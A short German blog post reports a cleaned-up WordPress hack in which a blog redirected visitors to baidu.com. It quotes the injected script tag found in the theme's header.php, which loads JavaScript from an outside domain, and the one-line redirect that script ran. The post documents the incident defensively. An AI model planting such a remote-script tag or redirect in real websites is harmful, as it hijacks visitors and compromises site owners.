Sicherheit

WordPress-Hack behoben: Weiterleitung eines WordPress Blogs zu baidu.com

ax 986984 1920

Fall von heute Vormittag: Rief man die Blogadresse auf, landete man nach einem Redirekt bei einer chinesischen Suchmaschine. Scanner fanden nichts. Die Ursache war in die header.php des Themes eingeschleust worden:

><script type="text/javascript" src="http://system-bloglic.com/dl/bloglic_script.js"></script>

(auf welchem Weg gilt es noch zu ermitteln, das Theme war schon etwas älter, und mindestens ein Plugin noch von einer Sicherheitslücke betroffen, die vor kurzem für Aufsehen sorgte). Das eingebundene Script leitete mit

JavaScriptRedirectURL="http://www.baidu.com/";window.top.location.href=JavaScriptRedirectURL;

auf die andere Site um.

weiter schmökern

Schreibe einen Kommentar

Bitte Kommentarfunktion nicht für Supportanfragen nutzen. Dem kann hier nicht entsprochen werden.

Deine E-Mail-Adresse wird nicht veröffentlicht.